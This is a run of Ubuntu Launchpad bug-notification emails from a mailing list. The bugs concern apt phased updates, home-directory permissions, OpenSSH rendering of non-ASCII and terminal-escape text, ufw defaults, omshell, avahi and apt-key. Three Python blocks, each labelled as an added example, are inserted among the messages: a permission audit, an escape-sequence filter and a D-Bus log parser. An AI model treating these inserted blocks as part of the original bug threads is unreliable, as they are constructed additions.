v2/3rd Gen Core processor Graphics Controller [8086:204d] InstallationDate: Installed on 2022-09-02 (0 days ago) InstallationMedia: Ubuntu 22.04.1 LTS "Jammy Jellyfish" - Release amd64 (20220809.1) ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-47-generic root=UUID=85140ee7-0511-45cd-aa7c-903f11fd90d1 ro quiet splash SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 09/07/2012 dmi.bios.release: 4.6 dmi.bios.vendor: Intel Corp. 
[Touch-packages] [Bug 1988819] Re: When apt keeps back packages due to phased updates, it should say so
I have seen many people on IRC *very* upset after wasting a lot of time trying to install updates that apt will not let them install. Fixing this is critical to our reputation. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1988819 Title: When apt keeps back packages due to phased updates, it should say so Status in apt package in Ubuntu: New Bug description: After phased updates have been introduced, it may happen that apt upgrade shows packages as upgradable but ends up not upgrading them. In this case the packages are indicated as being "kept back". Unfortunately, the feedback provided about this to the user is not very informative. The user sees the packages being kept back and thinks something is going wrong on the system. When packages are kept back because of phased updates, apt should say so e.g., it should say that the upgrade is delayed. Incidentally note that aptitude does not respect phased updates. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: apt 2.4.7 ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46 Uname: Linux 5.15.0-47-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Tue Sep 6 10:05:14 2022 EcryptfsInUse: Yes InstallationDate: Installed on 2020-02-16 (933 days ago) InstallationMedia: Kubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) SourcePackage: apt UpgradeStatus: Upgraded to jammy on 2022-06-03 (94 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1988819/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 48734] Re: Home permissions too open
On Mon, Sep 12, 2022 at 07:39:37AM -, Alkis Georgopoulos wrote: > This change takes away the ability of the users to share some of their data WITHOUT involving the administrator. Hello Alkis, do note that it is typical for users to own their own home directory; if a user wishes to share, they can run: chmod 755 ~ or chmod 751 ~ (The choice is based on whether they want to allow listing their home directory or not.) Of course, they'd be wise to inspect the permissions on their other files and directories to make sure they're only sharing what they intend to share. Of course, if the local administrator has decided that users cannot own their own home directories, then that's another question entirely, one you'll need to take up with the local administrator. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/48734 Title: Home permissions too open Status in adduser package in Ubuntu: Fix Released Status in shadow package in Ubuntu: Fix Released Status in adduser source package in Hirsute: Fix Released Status in shadow source package in Hirsute: Fix Released Status in Ubuntu RTM: Opinion Bug description: Binary package hint: debian-installer On a fresh dapper install I noticed that the file permissions for the home directory for the user created by the installer is set to 755, giving read access to everyone on the system. Surely this is a bad idea? If you're set on the idea can we at least have an option during the boot process? Also new files that are created via the console ('touch' etc.) are done so with '644' permissions, is there anything that can be done here? nautilus seems to create files at '600', which is a better setting.
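A way to carry out the inspection the reply above recommends before choosing between chmod 755 and chmod 751, as an added example (not part of the original message or of adduser). The function names and the sample tree are constructed for illustration; the audit only reads permission bits and never changes them.

```python
import os
import stat
import tempfile


def audit_home(home, home_mode):
    """Classify regular files under `home` that the "other" permission class
    could read if the home directory itself had mode `home_mode`.

    'listable'   : every directory on the path has o+r and o+x, so the file
                   can be found by browsing.
    'known-path' : every directory has o+x but at least one lacks o+r, so the
                   file opens only for someone who already knows its path.
    """
    exposed = {}

    def walk(path, rel, traversable, listable):
        if not traversable:
            return  # no o+x on this directory: nothing below it is reachable
        with os.scandir(path) as it:
            entries = sorted(it, key=lambda e: e.name)
        for entry in entries:
            st = entry.stat(follow_symlinks=False)  # symlinks are skipped below
            name = f"{rel}/{entry.name}" if rel else entry.name
            if stat.S_ISDIR(st.st_mode):
                x = bool(st.st_mode & stat.S_IXOTH)
                r = bool(st.st_mode & stat.S_IROTH)
                walk(entry.path, name, x, listable and r and x)
            elif stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH:
                exposed[name] = "listable" if listable else "known-path"

    x = bool(home_mode & stat.S_IXOTH)
    r = bool(home_mode & stat.S_IROTH)
    walk(home, "", x, r and x)
    return exposed


def build_sample_home(root):
    """Constructed sample tree; modes are set explicitly so the umask is irrelevant."""
    dir_modes = {"public": 0o755, ".ssh": 0o700}
    file_modes = {
        "notes.txt": 0o644,
        "secret.txt": 0o600,
        "public/index.html": 0o644,
        ".ssh/id_ed25519": 0o644,  # loose file mode, protected only by its directory
    }
    for d in dir_modes:
        os.mkdir(os.path.join(root, d))
    for rel, mode in file_modes.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    for d, mode in dir_modes.items():
        os.chmod(os.path.join(root, d), mode)


def demo():
    """Audit the sample tree under three candidate home-directory modes."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_home(root)
        return {mode: audit_home(root, mode) for mode in (0o755, 0o751, 0o750)}


if __name__ == "__main__":
    for mode, files in demo().items():
        print(oct(mode), files)
```

With 751 the same files are readable as with 755; the difference is only that their names cannot be listed, so anything with a predictable path is still shared.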
[Touch-packages] [Bug 2062667] Re: Fails on (and should be removed from) raspi desktop
I'm having trouble seeing what the consequences are: > the result is a permanently failed service vs > this is was a major annoyance on my m2 air after upgrading to noble Was it more than a red line in systemctl status output? Does it have annoying logging behaviour or break some other service if it isn't running? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-meta in Ubuntu. https://bugs.launchpad.net/bugs/2062667 Title: Fails on (and should be removed from) raspi desktop Status in protection-domain-mapper package in Ubuntu: Confirmed Status in qrtr package in Ubuntu: Confirmed Status in ubuntu-meta package in Ubuntu: Confirmed Bug description: The protection-domain-mapper package (and qrtr-tools) are both installed by default on the Ubuntu Desktop for Raspberry Pi images, thanks to their inclusion in the desktop-minimal seed for arm64. However, there's no hardware that they target on these platforms, and the result is a permanently failed service (pd-mapper.service). It appears these were added to support the X13s laptop [1]. I've attempted to work around the issue by excluding these packages in the desktop-raspi seed (experimentally in my no-pd-mapper branch [2]) but this does not work (the packages still appear in the built images). Ideally, these packages should be moved into a hardware-specific seed for the X13s (and/or whatever other laptops need these things). Alternatively, at a bare minimum, the package should have some conditional that causes the service not to attempt to start when it's not on Qualcomm hardware.
[1]: https://git.launchpad.net/~ubuntu-core-dev/ubuntu-seeds/+git/ubuntu/commit/desktop-minimal?id=afe820cd49514896e96d02303298ed873d8d7f8a [2]: https://git.launchpad.net/~waveform/ubuntu-seeds/+git/ubuntu/commit/?id=875bddac19675f7e971f56d9c5d39a9912dc6e38
[Touch-packages] [Bug 2077576] Re: SSH client doesn't handle properly non-ASCII chars
This change makes me uneasy: - I see no terminal-aware filtering applied in the notify_start() -> xvasprintf() -> writemsg() -> write() path. The remote server may not be entirely untrusted but it's also not exactly trusted, either, especially on the first use. There's a long and glorious history of surprising outcomes due to terminal escape sequences https://www.cyberark.com/resources/threat-research-blog/dont-trust-this-title-abusing-terminal-emulators-with-ansi-escape-characters - I'm not sure it's even necessary: my phone was easily able to read pure-ascii QR codes as easily as the (admittedly much better looking) utf-8 based codes. Try a few: sudo apt install qrencode u=`cat /proc/sys/kernel/random/uuid` ; for t in ANSI ANSI256 ASCII ASCIIi UTF8 ANSIUTF8 ; do qrencode -t $t $u ; done ; echo $u ; unset u Are ascii-encoded qr codes known to be insufficient? - As for the actual code changes, they seemed fairly straightforward, and I found no issues. I'm very wary about undoing a safety mechanism from the past, put in place by people who thought about this significantly more than I have. - Upstream might have been engaging for a while but now appears entirely silent. This reminds me too much of dpkg+zstd, where a similar train of engagement led to Ubuntu forking the dpkg ecosystem and carrying a patch without a clear way to reunify the ecosystem. Will we do the same to OpenSSH? (We might have already passed this point if we chose to ship this in Noble rather than wait for Oracular to test this out.) Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/2077576 Title: SSH client doesn't handle properly non-ASCII chars Status in openssh package in Ubuntu: Fix Released Status in openssh source package in Focal: Incomplete Status in openssh source package in Jammy: Incomplete Status in openssh source package in Noble: Fix Released Bug description: [ Impact ] Non-ascii visible chars (including back-slashes, new lines and so) are not properly rendered by clients, showing their octal visualization. Such as: Hello SSHD \\ We love \360\237\215\225! Instead of: Hello SSHD \ We love 🍕! This is particularly an issue when a server has configured keyboard interactive authentication and a PAM module wants to show non-ASCII characters such as a QR code for web authentication: When using an ubuntu server running authd for web authentication we may end up having the login qrcode rendered such as \210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210 https://ubuntu.com 1337 Which is clearly unreadable. [ Test case ] ## Server preparation Enable PAM and keyboard interactive authentication in a ssh server: Add a configuration file such as: /etc/ssh/sshd_config.d/test-ssh-pam.conf Containing: UsePAM yes KbdInteractiveAuthentication yes # This was working already; here to check potential regressions ForceCommand bash -c "echo Hello from SSHD \ We also love 🍕!; $SHELL" It's also suggested to check for regressions using a `Banner` option in sshd, pointing to a file with utf-8 contents. Restart the server: sudo systemctl restart ssh.service Edit the sshd PAM configuration file, adding as first line: authrequisite pam_echo.so Hello SSHD \ We love 🍕! 
Can be done with the command: sudo sed '1 iauth requisite pam_echo.so Hello SSHD! \\ We love 🍕!' -i /etc/pam.d/sshd ## Client test In the same host: ssh -o PubkeyAuthentication=no -o PasswordAuthentication=no -o PreferredAuthentications=keyboard-interactive $USER@localhost The client should show: Hello SSHD \ We love 🍕! ($USER@localhost) Password: ... Hello from SSHD \ We also love 🍕! Retry the same with another host and without keyboard authentication enabled in the server side. To verify the fix in more complex scenario it's possible to follow the instructions of configuring authd: - https://github.com/ubuntu/authd/wiki/05--How%E2%80%90to-log-in-over-SSH Once authd is configured, the user should be able to scan a QrCode from a ssh session. ## Cleanup Revert the changes done in the cleanup phase, after test is done sudo sed '/pam_echo\.so/d' -i /etc/pam.d/sshd sudo rm /etc/ssh/sshd_config.d/test-ssh-pam.conf [ Regression potential ] SSH info messages are not shown by the client. Even though those aren't covered by this change, it's important to check for regressions in an
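What a terminal-aware filter for server-supplied text could look like, next to a model of the ASCII-only rendering quoted in the bug description; this is an added example, not OpenSSH's code and not the Ubuntu patch. The function names, the set of escaped Unicode categories and the sample byte strings are assumptions made for the illustration.

```python
import unicodedata

# Controls that are safe to pass through to a terminal unchanged (assumption).
ALLOWED_CONTROLS = {"\n", "\t"}
# Unicode categories rendered as octal instead of being sent to the terminal:
# Cc = C0/C1 controls (ESC, CSI, BEL, DEL), Cf = format characters such as bidi
# overrides, Co = private use, Zl/Zp = line and paragraph separators.
ESCAPED_CATEGORIES = {"Cc", "Cf", "Co", "Zl", "Zp"}


def _octal(raw: bytes) -> str:
    return "".join("\\%03o" % b for b in raw)


def ascii_only(data: bytes) -> str:
    """Model of the rendering shown in the report: printable ASCII passes,
    a backslash is doubled, every other byte becomes a \\ooo escape."""
    out = []
    for b in data:
        if b == 0x5C:
            out.append("\\\\")
        elif 0x20 <= b <= 0x7E:
            out.append(chr(b))
        else:
            out.append(_octal(bytes([b])))
    return "".join(out)


def utf8_aware(data: bytes) -> str:
    """Pass printable Unicode through, but neutralise anything a terminal
    would interpret: control and format characters and undecodable bytes."""
    out = []
    # surrogateescape maps each undecodable byte 0x80..0xFF to U+DC80..U+DCFF
    for ch in data.decode("utf-8", errors="surrogateescape"):
        if ch in ALLOWED_CONTROLS:
            out.append(ch)
        elif 0xDC80 <= ord(ch) <= 0xDCFF:
            out.append(_octal(bytes([ord(ch) - 0xDC00])))
        elif unicodedata.category(ch) in ESCAPED_CATEGORIES:
            out.append(_octal(ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


# Constructed sample messages, as a PAM module or banner might send them.
SAMPLES = {
    "greeting": "Hello SSHD \\ We love 🍕!".encode(),
    "colour escape": b"\x1b[31mred\x1b[0m",
    "C1 control (CSI)": b"\xc2\x9bK",
    "invalid UTF-8": b"a\xffb",
    "bidi override": "x\u202ey".encode(),
    "QR block": "█\n".encode(),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:18} ascii_only={ascii_only(raw)!r} utf8_aware={utf8_aware(raw)!r}")
```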
[Touch-packages] [Bug 1999155] Re: UFW Disabled by default
Hello Pedro, thanks for the report; this was an explicit decision: https://wiki.ubuntu.com/SecurityTeam/FAQ#UFW Making firewall rules that are tight enough to stop threats yet open enough for the computer to still be useful in a wide variety of environments is very challenging. We've decided that it's better for the tools to be available but not try to provide a default configuration. Thanks ** Information type changed from Private Security to Public Security ** Changed in: ufw (Ubuntu) Status: New => Opinion -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ufw in Ubuntu. https://bugs.launchpad.net/bugs/1999155 Title: UFW Disabled by default Status in ufw package in Ubuntu: Opinion Bug description: UFW or iptables is disabled by default on both ubuntu server and desktop, which poses a major security risk as ports that shouldn't be open, are open by default, specially for incoming connections. If UFW breaks working apps on Ubuntu server and desktop, at least make it enabled by default but reject all incoming connections. Malware and exploits are out in the open, and no one in their sane mind would a Firewall suit disabled on Linux or Windows. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ufw/+bug/1999155/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1916931] Re: omshell returns inconsistent results or segfaults
Bill, Lukas asked a question in comment #10 and set the bug to 'incomplete', hoping to get feedback from someone who could reproduce the problem. If you can provide an answer, please do set the bug back to 'confirmed' when answering. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu. https://bugs.launchpad.net/bugs/1916931 Title: omshell returns inconsistent results or segfaults Status in isc-dhcp package in Ubuntu: Expired Bug description: I have just built a Ubuntu 20.04 server and installed isc-dhcp-server 4.4.1 on it and I am seeing inconsistent returns from omshell. Initially omshell returns data as expected, but when I exit and re-enter omshell connections fail. Here is the initial, working, session: # omshell > server localhost > port 7911 > key omapi_key > connect obj: > new failover-state obj: failover-state > set name = "dhcp-failover" obj: failover-state name = "dhcp-failover" > open obj: failover-state name = "dhcp-failover" partner-address = c0:9d:e9:76:e9:55:00:00 partner-port = 00:00:02:07 local-address = 10:9d:e9:76:e9:55:00:00 local-port = 00:00:02:07 max-outstanding-updates = 00:00:00:0a mclt = 00:00:01:2c load-balance-max-secs = 00:00:00:03 load-balance-hba = ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 partner-state = 00:00:00:02 local-state = 00:00:00:02 partner-stos = 60:36:d0:68 local-stos = 60:36:8b:3b hierarchy = 00:00:00:01 last-packet-sent = 00:00:00:00 last-timestamp-received = 00:00:00:00 skew = 00:00:00:00 max-response-delay = 00:00:00:3c cur-unacked-updates = 00:00:00:00 Here is what I see when the connect fails. Well, just hangs really. 
# omshell > server localhost > port 7911 > key omapi_key > connect And then I hit ctrl-c to break out and tried again: # omshell > server localhost > port 7911 > key omapi_key > connect Segmentation fault (core dumped) Note, the peer to this server is still running Ubuntu 18.04 with isc-dhcp-server 4.3.5. Running the exact same commands on the peer works reliably. (They are using the same python script to drive omshell.) The DHCP server on the new system appears to be working just fine as reported by omshell on the peer and systemctl. I was curious if the problem could be with the mis-matched versions of isc-dhcp-server so I shutdown isc-dhcp-server on the 18.04 system and get the same results. I also tried using a python script with the pypureomapi module to try and determine if the problem was in omshell or the server. I got very similar results when I attempted to get information about the failover state of the server. Interestingly interrogating the server about host information seems to work just fine. This is a critical bug since I don't see how to fail over a DHCP that is running the isc-dhcp-server on 20.04 without being able to issue omapi commands. I am attaching apport output to this bug report. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1916931/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2002891] Re: avahi_service_browser_new() failed: Invalid service type
** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to avahi in Ubuntu.
https://bugs.launchpad.net/bugs/2002891

Title:
  avahi_service_browser_new() failed: Invalid service type

Status in avahi package in Ubuntu:
  New

Bug description:
  Hi,

  on a network, where the router offers DHCP, but does not put the DHCP clients in a DNS domain, thus where it is necessary to use mdns/avahi instead, I ran into several problems with avahi.

  One is

  avahi-browse -a -t
  avahi_service_browser_new() failed: Invalid service type

  No other output. i.e. it just does not work.

  In this network, all Ubuntu machines show this behaviour. In my other network (with working DHCP-DNS, different router, different brand, therefore not depending on mdns) the problem does not occur.

  Since the debugging output of avahi software is – if at all – very poor, I cannot see what causes this problem.

  However, dbus-monitor --system showed

  ...
  method call time=1673742811.321042 sender=:1.692 -> destination=org.freedesktop.Avahi serial=10 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew
     int32 -1
     int32 -1
     string "_ipp._tcp"
     string "local"
     uint32 0
  method return time=1673742811.321093 sender=:1.479 -> destination=:1.692 serial=557 reply_serial=10
     object path "/Client29/ServiceBrowser3"
  method call time=1673742811.321259 sender=:1.692 -> destination=org.freedesktop.Avahi serial=11 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew
     int32 -1
     int32 -1
     string "_scanner._tcp"
     string "local"
     uint32 0
  method return time=1673742811.321301 sender=:1.479 -> destination=:1.692 serial=558 reply_serial=11
     object path "/Client29/ServiceBrowser4"
  method call time=1673742811.321391 sender=:1.692 -> destination=org.freedesktop.Avahi serial=12 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew
     int32 -1
     int32 -1
     string ""
     string ""
     uint32 0
  error time=1673742811.321479 sender=:1.479 -> destination=:1.692 error_name=org.freedesktop.Avahi.InvalidServiceTypeError reply_serial=12
     string "Invalid service type"

  So it seems as if the client (browser) queries one service after the other, which works, but then an empty string as a name, which is rejected by the daemon, which then makes the client spit out this error message and then terminate immediately.

  Since I have similar (i.e. very similar, both created with puppet) machines, and all machines in one network fail, while similar machines in another don't, I guess that the problem is caused by some network reply, maybe a printer.

  This, however, could be a security problem, because if someone can cause avahi and thus mdns resolution to fail in networks like this here, where the router and dhcp server does not offer the host names in a DNS domain (Huawei glass fiber router), a malformed packet could cause the mdns resolution of avahi to fail and therefore could be used for an attack, effectively blocking certain kinds of mdns service resolution.

  But since I have not yet understood what really causes this problem, it is just an assumption.

  regards

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: avahi-utils 0.8-5ubuntu5
  ProcVersionSignature: Ubuntu 5.15.0-58.64-generic 5.15.74
  Uname: Linux 5.15.0-58-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu82.3
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: XFCE
  Date: Sun Jan 15 02:35:24 2023
  InstallationDate: Installed on 2022-12-25 (20 days ago)
  InstallationMedia: Xubuntu 22.04.1 LTS "Jammy Jellyfish" - Release amd64 (20220809.1)
  SourcePackage: avahi
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/avahi/+bug/2002891/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
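The correlation the report does by eye on the dbus-monitor trace, as an added example that is not part of the original report or of avahi: it pairs each D-Bus error with the method call it answers (caller sender + serial against error destination + reply_serial) and flags a ServiceBrowserNew call whose service type is empty. The sample is constructed from the calls quoted above, laid out in dbus-monitor's multi-line form; treating the first string argument as the service type is an assumption based on the "_ipp._tcp" / "local" calls in the trace.

```python
import re

# Constructed sample: calls taken from the report, one header line per
# message followed by indented argument lines, as dbus-monitor prints them.
SAMPLE = '''\
method call time=1673742811.321259 sender=:1.692 -> destination=org.freedesktop.Avahi serial=11 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew
   int32 -1
   int32 -1
   string "_scanner._tcp"
   string "local"
   uint32 0
method return time=1673742811.321301 sender=:1.479 -> destination=:1.692 serial=558 reply_serial=11
   object path "/Client29/ServiceBrowser4"
method call time=1673742811.321391 sender=:1.692 -> destination=org.freedesktop.Avahi serial=12 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew
   int32 -1
   int32 -1
   string ""
   string ""
   uint32 0
error time=1673742811.321479 sender=:1.479 -> destination=:1.692 error_name=org.freedesktop.Avahi.InvalidServiceTypeError reply_serial=12
   string "Invalid service type"
'''

HEADER = re.compile(r'^(method call|method return|error|signal) (.*)$')
FIELD = re.compile(r'(\w+)=(\S+)')
ARG = re.compile(r'^\s+(object path|\w+) (.*)$')


def parse_messages(text):
    """Split dbus-monitor text into messages: kind, header fields, arguments."""
    messages = []
    for line in text.splitlines():
        head = HEADER.match(line)
        if head:
            # path= and interface= carry a trailing ';' in dbus-monitor output.
            fields = {k: v.rstrip(';') for k, v in FIELD.findall(head.group(2))}
            messages.append({'kind': head.group(1), 'fields': fields, 'args': []})
            continue
        arg = ARG.match(line)
        if arg and messages:
            value = arg.group(2)
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]  # drop the surrounding quotes of a string
            messages[-1]['args'].append((arg.group(1), value))
    return messages


def failed_calls(messages):
    """Pair every error reply with the method call that triggered it."""
    calls = {}
    failures = []
    for msg in messages:
        fields = msg['fields']
        if msg['kind'] == 'method call':
            calls[(fields.get('sender'), fields.get('serial'))] = msg
        elif msg['kind'] == 'error':
            call = calls.get((fields.get('destination'), fields.get('reply_serial')))
            if call is None:
                continue  # error for a call outside the captured window
            strings = [v for t, v in call['args'] if t == 'string']
            member = call['fields'].get('member')
            failures.append({
                'member': member,
                'caller': call['fields'].get('sender'),
                'strings': strings,
                'error_name': fields.get('error_name'),
                'error_text': next((v for t, v in msg['args'] if t == 'string'), ''),
                # Assumption: first string argument is the service type.
                'empty_service_type': member == 'ServiceBrowserNew'
                                      and bool(strings) and strings[0] == '',
            })
    return failures


if __name__ == '__main__':
    for failure in failed_calls(parse_messages(SAMPLE)):
        print(failure)
```

Run over a longer capture, the same pairing shows which call immediately preceded the empty request, which is the piece of evidence the report says it is missing.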
[Touch-packages] [Bug 2002891] Re: avahi_service_browser_new() failed: Invalid service type
Hello Hadmut, my first inclination is that this isn't a security issue:

- services should use cryptographic verification of both peers, if this is important
- network administrators can use port security settings on their equipment to restrict which hosts can communicate in which fashions

If I've overlooked something, please do let us know.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to avahi in Ubuntu.
https://bugs.launchpad.net/bugs/2002891

Title:
  avahi_service_browser_new() failed: Invalid service type

Status in avahi package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/avahi/+bug/2002891/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1916931] Re: omshell returns inconsistent results or segfaults
** Changed in: isc-dhcp (Ubuntu)
       Status: Expired => New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1916931

Title:
  omshell returns inconsistent results or segfaults

Status in isc-dhcp package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1916931/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988819] Re: When apt keeps back packages due to phased updates, it should say nothing
So far I've been arguing that apt should be more verbose about phasing, and why these packages are held back. A friend has suggested that instead apt should say *nothing*. I can see the appeal.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1988819

Title:
  When apt keeps back packages due to phased updates, it should say nothing

Status in apt package in Ubuntu:
  Triaged

Bug description:
  After phased updates have been introduced, it may happen that apt upgrade shows packages as upgradable but ends up not upgrading them. In this case the packages are indicated as being "kept back". Unfortunately, the feedback provided about this to the user is not very informative. The user sees the packages being kept back and thinks something is going wrong on the system.

  When packages are kept back because of phased updates, apt should say so e.g., it should say that the upgrade is delayed.

  Incidentally note that aptitude does not respect phased updates.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: apt 2.4.7
  ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46
  Uname: Linux 5.15.0-47-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82.1
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: KDE
  Date: Tue Sep 6 10:05:14 2022
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2020-02-16 (933 days ago)
  InstallationMedia: Kubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017)
  SourcePackage: apt
  UpgradeStatus: Upgraded to jammy on 2022-06-03 (94 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1988819/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2003759] [NEW] apt phasing should be documented in apt.conf(5) rather than apt_preferences(5)
Public bug reported:

Hello, the apt documentation on controlling apt phasing is in apt_preferences(5). However, putting the records into a file in /etc/apt/preferences.d leads to an error:

  $ rg -l APT::Machine-ID -g '*.xml'
  apt_2.2.2ubuntu1/doc/apt_preferences.5.xml
  apt_2.3.10/doc/apt_preferences.5.xml
  apt_2.3.7/doc/apt_preferences.5.xml
  apt_2.1.17/doc/apt_preferences.5.xml
  apt_2.3.3/doc/apt_preferences.5.xml
  apt_2.3.9/doc/apt_preferences.5.xml
  apt_2.4.8/doc/apt_preferences.5.xml
  apt_2.2.3/doc/apt_preferences.5.xml
  apt_2.5.0/doc/apt_preferences.5.xml
  apt_2.4.5/doc/apt_preferences.5.xml
  apt_2.3.13/doc/apt_preferences.5.xml
  apt_2.2.1/doc/apt_preferences.5.xml
  apt_2.3.11/doc/apt_preferences.5.xml
  apt_2.3.6/doc/apt_preferences.5.xml
  apt_2.1.16/doc/apt_preferences.5.xml
  apt_2.3.9ubuntu0.1/doc/apt_preferences.5.xml
  apt_2.5.3/doc/apt_preferences.5.xml
  apt_2.4.0/doc/apt_preferences.5.xml
  apt_2.3.5/doc/apt_preferences.5.xml
  apt_2.2.2/doc/apt_preferences.5.xml
  apt_2.3.15build1/doc/apt_preferences.5.xml
  apt_2.3.15/doc/apt_preferences.5.xml
  apt_2.3.8/doc/apt_preferences.5.xml
  apt_2.2.4ubuntu0.1/doc/apt_preferences.5.xml
  apt_2.4.3/doc/apt_preferences.5.xml
  apt_2.1.18/doc/apt_preferences.5.xml
  ⏚ [sarnold:/etc/apt] $ sudo vim /etc/apt/preferences.d/phased-updates
  [sudo] password for sarnold:
  ⏚ [sarnold:/etc/apt] 11s $ apt list
  E: Invalid record in the preferences file /etc/apt/preferences.d/phased-updates, no Package header
  ⏚ [sarnold:/etc/apt] $ cat /etc/apt/preferences.d/phased-updates
  // To have all your machines phase the same, set the same string in this field
  // If commented out, apt will use /etc/machine-id to seed the random number generator
  APT::Machine-ID "";

  // Always include phased updates
  APT::Get::Always-Include-Phased-Updates "1";

  // Never include phased updates
  # APT::Get::Never-Include-Phased-Updates "1";

Considering how difficult it is to tell which of preferences vs conf should be used for which settings, mentioning phasing in both manpages would be very kind. However, both manpages should be clear about which one is actually correct.

Thanks

** Affects: apt (Ubuntu)
     Importance: Undecided
         Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/2003759

Title:
  apt phasing should be documented in apt.conf(5) rather than apt_preferences(5)

Status in apt package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2003759/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More h
[Touch-packages] [Bug 2004505] [NEW] apt-key is still packaged
Public bug reported:

The apt-key(8) manpage includes:

  apt-key(8) will last be available in Debian 11 and Ubuntu 22.04.

It appears that apt-key was shipped in Ubuntu 22.10 by accident.

apt-key is still in the 2.5.5 apt packaged for Lunar:
https://launchpad.net/ubuntu/lunar/amd64/apt/2.5.5

  ⏚ [sarnold:/tmp] $ wget http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb
